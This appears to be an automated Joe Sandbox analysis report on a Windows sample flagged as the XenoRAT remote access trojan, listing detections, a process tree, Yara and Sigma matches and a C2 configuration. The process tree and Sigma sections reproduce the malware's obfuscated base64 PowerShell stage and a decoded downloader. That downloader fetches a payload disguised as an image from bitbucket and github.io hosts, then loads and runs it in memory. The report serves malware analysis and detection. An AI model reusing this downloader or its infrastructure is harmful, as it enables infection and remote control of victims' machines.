Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
Analysis ID:1611341
MD5:6159b2025a32b10d721f03c7141577d8
SHA1:829beb712c7ad268f05865bc982d9db519079433
SHA256:8db64fb78d54b15b0648d454b3678b0200431114cb1058d70f4783278b7feb70
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

XenoRAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected XenoRAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs new ROOT certificates
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe (PID: 6736 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe" MD5: 6159B2025A32B10D721F03C7141577D8)
    • cmd.exe (PID: 5164 cmdline: cmd.exe /c 67a7e5e159f71.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 5100 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 1352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@I@@o@Cc@I@B0@Hg@d@@u@GQ@cgBi@GY@bwBq@FM@LwBz@GU@b@Bp@GY@XwBj@Gk@b@Bi@HU@c@@v@DQ@Ng@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@FY@YgBj@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.drbfojS/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Vbc', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
            • vbc.exe (PID: 2404 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
              • Vbc.exe (PID: 3540 cmdline: "C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
                • conhost.exe (PID: 2644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • rundll32.exe (PID: 6112 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XenoRATNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xenorat

Malware Configuration

Threatname: XenoRAT

{"C2 url": "failed2.myftp.org", "Mutex Name": "Winsock2Mutex", "Install Folder": "appdata"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2278176981.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XenoRATYara detected XenoRATJoe Security
    Process Memory Space: powershell.exe PID: 1352JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 1352INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x2407b:$b2: ::FromBase64String(
      • 0x59ea1:$b2: ::FromBase64String(
      • 0x23e4e:$b3: ::UTF8.GetString(
      • 0x9b132:$s1: -join
      • 0xa462e:$s1: -join
      • 0x4011:$s3: reverse
      • 0xf84f:$s3: reverse
      • 0x26a9b:$s3: reverse
      • 0x2d6f0:$s3: reverse
      • 0x2f6d7:$s3: reverse
      • 0x3a706:$s3: reverse
      • 0x4aeb0:$s3: reverse
      • 0x50c1d:$s3: reverse
      • 0xf34e2:$s3: reverse
      • 0xf37d0:$s3: reverse
      • 0xf3eea:$s3: reverse
      • 0xf46a3:$s3: reverse
      • 0xfb78e:$s3: reverse
      • 0xfbba8:$s3: reverse
      • 0xfc730:$s3: reverse
      • 0xfd3dd:$s3: reverse
      Process Memory Space: powershell.exe PID: 5388JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 5388INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x41c3:$b2: ::FromBase64String(
        • 0x279f7:$b2: ::FromBase64String(
        • 0x31b4f:$b2: ::FromBase64String(
        • 0x483a9:$b2: ::FromBase64String(
        • 0x4d160:$b2: ::FromBase64String(
        • 0x4e739:$b2: ::FromBase64String(
        • 0x3f96:$b3: ::UTF8.GetString(
        • 0x277ca:$b3: ::UTF8.GetString(
        • 0x31922:$b3: ::UTF8.GetString(
        • 0x4817c:$b3: ::UTF8.GetString(
        • 0x4cf33:$b3: ::UTF8.GetString(
        • 0x4e50c:$b3: ::UTF8.GetString(
        • 0x239e2:$s1: -join
        • 0x5942a:$s1: -join
        • 0x5b7f4:$s1: -join
        • 0x40b8:$s4: +=
        • 0x1e447:$s4: +=
        • 0x1e4e9:$s4: +=
        • 0x21c01:$s4: +=
        • 0x236b7:$s4: +=
        • 0x238cd:$s4: +=
        Click to see the 1 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        9.2.vbc.exe.400000.0.unpackJoeSecurity_XenoRATYara detected XenoRATJoe Security

          Other

          SourceRuleDescriptionAuthorStrings
          amsi64_5388.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

            Sigma Signatures

            Spreading

            barindex
            Sigma detected: Powershell download payload from hardcoded c2 list
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.drbfojS/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Vbc', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Conve

            System Summary

            barindex
            Sigma detected: Base64 Encoded PowerShell Command Detected
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I
            Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
